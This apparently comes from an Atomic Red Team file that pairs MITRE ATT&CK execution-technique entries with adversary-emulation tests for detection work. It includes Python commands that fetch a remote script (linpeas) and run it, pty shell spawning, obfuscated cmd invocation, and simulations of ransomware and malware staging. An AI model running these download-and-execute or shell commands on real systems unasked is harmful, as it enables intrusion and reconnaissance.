created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1203
external_id: T1203
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:18.695Z'
name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.5'
x_mitre_remote_support: false
atomic_tests: []
T1059.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c283d88f-8c23-4318-9da5-3d50cecad756
created: '2025-06-15T21:41:27.262Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/013
external_id: T1059.013
- source_name: Docker Desktop CLI
description: dockerdocs. (n.d.). Use the Docker Desktop CLI. Retrieved October
21, 2025.
url: https://docs.docker.com/desktop/features/desktop-cli/
- source_name: Cisco Talos Blog
description: Jaeson Schultz, Darin Smith. (2022, April 21). TeamTNT Targeting
AWS, Alibaba. Retrieved June 15, 2025.
url: https://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/
- source_name: Intezer
description: 'Nicole Fishbein. (2020, July 28). Watch Your Containers: Doki
Infecting Docker Servers in the Cloud. Retrieved June 15, 2025.'
url: https://intezer.com/blog/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/
- source_name: aquasec
description: Ofek Itach, Assaf Morag. (2023, July 13). TeamTNT Reemerged with
New Aggressive Cloud Campaign. Retrieved June 15, 2025.
url: https://www.aquasec.com/blog/teamtnt-reemerged-with-new-aggressive-cloud-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T23:52:40.200Z'
name: Container CLI/API
description: |-
Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments.
The Docker CLI is used for managing containers via an exposed API point from the `dockerd` daemon. Some common examples of Docker CLI include Docker Desktop CLI and Docker Compose, but users are also able to use SDKs to interact with the API. For example, Docker SDK for Python can be used to run commands within a Python application.(Citation: Docker Desktop CLI)
Adversaries may leverage the Docker CLI, API, or SDK to pull or build Docker images (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Build Image on Host](https://attack.mitre.org/techniques/T1612)), run containers (i.e., [Deploy Container](https://attack.mitre.org/techniques/T1610)), or execute commands inside running containers (i.e., [Container Administration Command](https://attack.mitre.org/techniques/T1609)). In some cases, threat actors may pull legitimate images that include scripts or tools that they can leverage - for example, using an image that includes the `curl` command to download payloads.(Citation: Intezer) Adversaries may also utilize `docker inspect` and `docker ps` to scan for cloud environment variables and other running containers (i.e., [Container and Resource Discovery](https://attack.mitre.org/techniques/T1613)).(Citation: Cisco Talos Blog)(Citation: aquasec)
Kubernetes is responsible for the management and orchestration of containers across clusters. The Kubernetes control plane, which manages the state of the cluster and is responsible for scheduling, communication, and resource monitoring, can be invoked directly via the API or indirectly via CLI tools such as `kubectl`. It may also be accessed within client libraries such as Go or Python. By utilizing the API, administrators can interact with resources within the cluster such as listing or creating pods, which is a group of one or more containers. Adversaries call the API server via `curl` or other tools, allowing them to obtain further information about the environment such as pods, deployments, daemonsets, namespaces, or sysvars.(Citation: aquasec) They may also run various commands regarding resource management.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.0'
x_mitre_remote_support: false
atomic_tests: []
T1059.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1
created: '2020-03-09T14:38:24.334Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/006
external_id: T1059.006
- source_name: Zscaler APT31 Covid-19 October 2020
description: Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages
COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved
March 24, 2021.
url: https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:23.660Z'
name: 'Command and Scripting Interpreter: Python'
description: |-
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.1'
x_mitre_remote_support: false
identifier: T1059.006
atomic_tests:
- name: Execute shell script via python's command mode arguement
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute
locally using Python -c (command mode)
supported_platforms:
- linux
input_arguments:
script_url:
description: Shell script public URL
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Name of shell script downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: FreeBSD or Linux shell
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process
details, environment paths, open sockets, and interesting files.
type: string
default: "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI,
IntFiles"
dependency_executor_name: sh
dependencies:
- description: Verify if python is in the environment variable path and attempt
to import requests library.
prereq_command: |
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: 'pip install requests
'
executor:
command: |
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
name: sh
cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
nul\n"
- name: Execute Python via scripts
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script
via executor arguments
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Python script name
type: path
default: T1059.006.py
script_url:
description: Shell script public URL
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process
details, environment paths, open sockets, and interesting files
type: string
default: "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI,
IntFiles"
dependency_executor_name: sh
dependencies:
- description: 'Requires Python
'
prereq_command: |
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: "pip install requests \n"
executor:
command: |
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
name: sh
cleanup_command: "rm #{python_script_name} #{payload_file_name} \n"
- name: Execute Python via Python executables
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
description: 'Create Python file (.py) then compile to binary (.pyc) that downloads
an external malicious script then executes locally using the supplied executor
and arguments
'
supported_platforms:
- linux
input_arguments:
python_script_name:
description: Name of Python script name
type: path
default: T1059.006.py
script_url:
description: URL hosting external malicious payload
type: string
default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
payload_file_name:
description: Shell script file name downloaded from the script_url
type: string
default: T1059.006-payload
executor:
description: Payload or script interpreter / executor
type: string
default: sh
script_args:
description: Arguments to check for system stats, available software, process
details, environment paths, open sockets, and interesting files
type: string
default: "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI,
IntFiles"
python_binary_name:
description: Name of Python file to be compiled
type: path
default: T1059.006.pyc
dependency_executor_name: sh
dependencies:
- description: 'Requires Python
'
prereq_command: |
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
get_prereq_command: "pip install requests \n"
executor:
command: |
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
name: sh
cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
'
- name: Python pty module and spawn function used to spawn sh or bash
auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
description: 'Uses the Python spawn function to spawn a sh shell followed by
a bash shell. Per Volexity, this technique was observed in exploitation of
Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
'
supported_platforms:
- linux
dependencies:
- description: 'Verify if python is in the environment variable path and attempt
to import requests library.
'
prereq_command: "which_python=$(which python || which python3 || which python3.9
|| which python2); $which_python -V\n$which_python -c 'import requests'
2>/dev/null; echo $? \n"
get_prereq_command: 'pip install requests
'
executor:
command: |-
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: sh
T1569:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
created: '2020-03-10T18:23:06.482Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1569
external_id: T1569
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:25.548Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
or creating services either locally or remotely. Many services are set to
run at boot, which can aid in achieving persistence ([Create or Modify System
Process](https://attack.mitre.org/techniques/T1543)), but adversaries can
also abuse services for one-time or temporary execution.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.4'
atomic_tests: []
T1059.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
created: '2020-03-09T14:12:31.196Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/003
external_id: T1059.003
- source_name: SSH in Windows
description: 'Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal.
Retrieved July 26, 2021.'
url: https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:25.722Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.5'
x_mitre_remote_support: false
identifier: T1059.003
atomic_tests:
- name: Create and Execute Batch Script
auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388
description: 'Creates and executes a simple batch script. Upon execution, CMD
will briefly launch to run the batch script then close again.
'
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Command to execute within script.
type: string
default: dir
script_path:
description: Script path.
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1059.003_script.bat
dependency_executor_name: powershell
dependencies:
- description: 'Batch file must exist on disk at specified location (#{script_path})
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item "#{script_path}" -Force | Out-Null
Set-Content -Path "#{script_path}" -Value "#{command_to_execute}"
executor:
command: 'Start-Process "#{script_path}"
'
cleanup_command: 'Remove-Item "#{script_path}" -Force -ErrorAction Ignore
'
name: powershell
- name: Writes text to a file and displays it.
auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
description: 'Writes text to a file and display the results. This test is intended
to emulate the dropping of a malicious file to disk.
'
supported_platforms:
- windows
input_arguments:
file_contents_path:
description: Path to the file that the command prompt will drop.
type: path
default: "%TEMP%\\test.bin"
message:
description: Message that will be written to disk and then displayed.
type: string
default: Hello from the Windows Command Prompt!
executor:
command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
'
cleanup_command: 'del "#{file_contents_path}" >nul 2>&1
'
name: command_prompt
- name: Suspicious Execution via Windows Command Shell
auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
description: 'Command line executed via suspicious invocation. Example is from
the 2021 Threat Detection Report by Red Canary.
'
supported_platforms:
- windows
input_arguments:
output_file:
description: File to output to
type: string
default: hello.txt
input_message:
description: Message to write to file
type: string
default: Hello, from CMD!
executor:
command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
& type #{output_file}\n"
name: command_prompt
- name: Simulate BlackByte Ransomware Print Bombing
auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
description: "This test attempts to open a file a specified number of times
in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte
ransomware's print bombing technique, where tree.dll, which contains the ransom
note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/.
\n"
supported_platforms:
- windows
input_arguments:
file_to_print:
description: File to be opened/printed by Wordpad.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\T1059_003note.txt
max_to_print:
description: The maximum number of Wordpad windows the test will open/print.
type: integer
default: 75
dependency_executor_name: powershell
dependencies:
- description: 'File to print must exist on disk at specified location (#{file_to_print})
'
prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
'
get_prereq_command: 'new-item "#{file_to_print}" -value "This file has been
created by T1059.003 Test 4" -Force | Out-Null
'
executor:
command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
/p #{file_to_print}" | out-null
'
cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
'
name: powershell
- name: Command Prompt read contents from CMD file and execute
auto_generated_guid: df81db1b-066c-4802-9bc8-b6d030c3ba8e
description: "Simulate Raspberry Robin using the \"standard-in\" command prompt
feature cmd `/R <` to read and execute a file via cmd.exe\nSee https://redcanary.com/blog/raspberry-robin/.
\n"
supported_platforms:
- windows
input_arguments:
input_file:
description: CMD file that is read by Command Prompt and execute, which
launches calc.exe
type: path
default: PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd
dependency_executor_name: powershell
dependencies:
- description: 'CMD file must exist on disk at specified location (#{input_file})
'
prereq_command: 'if (Test-Path "#{input_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{input_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1059.003/src/t1059.003_cmd.cmd" -OutFile "#{input_file}"
executor:
command: 'cmd /r cmd<"#{input_file}"
'
name: command_prompt
elevation_required: false
- name: Command prompt writing script to file then executes it
auto_generated_guid: '00682c9f-7df4-4df8-950b-6dcaaa3ad9af'
description: |2-
Simulate DarkGate malware's second stage by writing a VBscript to disk directly from the command prompt then executing it.
The script will execute 'whoami' then exit.
supported_platforms:
- windows
input_arguments:
script_path:
description: Path in which the script will be written.
type: path
default: "%TEMP%\\"
script_name:
description: Script name (without the extension)
type: string
default: AtomicTest
executor:
command: ' c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set
objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set
objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs'
cleanup_command: del "#{script_name}.vbs" >nul 2>&1
name: command_prompt
elevation_required: true
T1059.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d2d642da-61ff-4211-b4df-7923c9ca220c
created: '2025-03-26T20:01:13.412Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/012
external_id: T1059.012
- source_name: Broadcom ESXCLI Reference
description: Broadcom. (n.d.). ESXCLI Reference. Retrieved March 27, 2025.
url: https://developer.broadcom.com/xapis/esxcli-command-reference/latest/
- source_name: LOLESXi
description: Janantha Marasinghe. (n.d.). Living Off The Land ESXi. Retrieved
April 14, 2025.
url: https://lolesxi-project.github.io/LOLESXi/
- source_name: Crowdstrike Hypervisor Jackpotting Pt 2 2021
description: 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part
2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved
March 26, 2025.'
url: https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:24:59.280Z'
name: Hypervisor CLI
description: "Adversaries may abuse hypervisor command line interpreters (CLIs)
to execute malicious commands. Hypervisor CLIs typically enable a wide variety
of functionality for managing both the hypervisor itself and the guest virtual
machines it hosts. \n\nFor example, on ESXi systems, tools such as `esxcli`
and `vim-cmd` allow administrators to configure firewall rules and log forwarding
on the hypervisor, list virtual machines, start and stop virtual machines,
and more.(Citation: Broadcom ESXCLI Reference)(Citation: Crowdstrike Hypervisor
Jackpotting Pt 2 2021)(Citation: LOLESXi) Adversaries may be able to leverage
these tools in order to support further actions, such as [File and Directory
Discovery](https://attack.mitre.org/techniques/T1083) or [Data Encrypted for
Impact](https://attack.mitre.org/techniques/T1486)."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Janantha Marasinghe
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
x_mitre_version: '1.0'
x_mitre_remote_support: false
atomic_tests: []
T1651:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7
created: '2023-03-13T15:26:11.741Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1651
external_id: T1651
- source_name: AWS Systems Manager Run Command
description: AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March
13, 2023.
url: https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
Retrieved March 25, 2022.
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
- source_name: Microsoft Run Command
description: Microsoft. (2023, March 10). Run scripts in your VM by using
Run Command. Retrieved March 13, 2023.
url: https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:59:13.081Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Cisco
- Nichols Jasper
- Jared Wilson
- Caio Silva
- Adrien Bataille
- Anders Vejlby
- Nader Zaveri
- Tamir Yehuda
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '2.1'
identifier: T1651
atomic_tests:
- name: AWS Run Command (and Control)
auto_generated_guid: a3cc9c95-c160-4b86-af6f-84fba87bfd30
description: 'This test simulates an adversary using the AWS Run Command service
to execute commands on EC2 instances.
'
supported_platforms:
- iaas:aws
input_arguments:
access_key:
description: AWS Access Key
type: string
default: ''
secret_key:
description: AWS Secret Key
type: string
default: ''
session_token:
description: AWS Session Token
type: string
default: ''
profile:
description: AWS profile
type: string
default: ''
region:
description: AWS region to deploy the EC2 instance
type: string
default: us-east-2
dependency_executor_name: powershell
dependencies:
- description: 'The AWS PowerShell module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
'
- description: 'Terraform must be installed.
'
prereq_command: 'terraform --version
'
get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
'
executor:
command: |
Import-Module "PathToAtomicsFolder/T1651/src/T1651-1/AWSSSMAttack.ps1" -Force
$access_key = "#{access_key}"
$secret_key = "#{secret_key}"
$session_token = "#{session_token}"
$aws_profile = "#{profile}"
$region = "#{region}"
Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
Invoke-SSMAttack -AWSProfile "T1651-1" -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
name: powershell
T1059.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
created: '2020-03-09T14:29:51.508Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1059/005
external_id: T1059.005
- source_name: VB .NET Mar 2020
description: ".NET Team. (2020, March 11). Visual Basic support planned for
.NET 5.0. Retrieved June 23, 2020."
url: https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/
- source_name: 'Default VBS macros Blocking '
description: 'Kellie Eickmeyer. (2022, February 7). Helping users stay safe:
Blocking internet macros by default in Office. Retrieved February 7, 2022.'
url: https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
- source_name: Microsoft VBScript
description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March
28, 2020.
url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
- source_name: Microsoft VBA
description: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June
23, 2020.
url: https://docs.microsoft.com/office/vba/api/overview/
- source_name: VB Microsoft
description: Microsoft. (n.d.). Visual Basic documentation. Retrieved June
23, 2020.
url: https://docs.microsoft.com/dotnet/visual-basic/
- source_name: Wikipedia VBA
description: Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August
13, 2020.
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:29.678Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
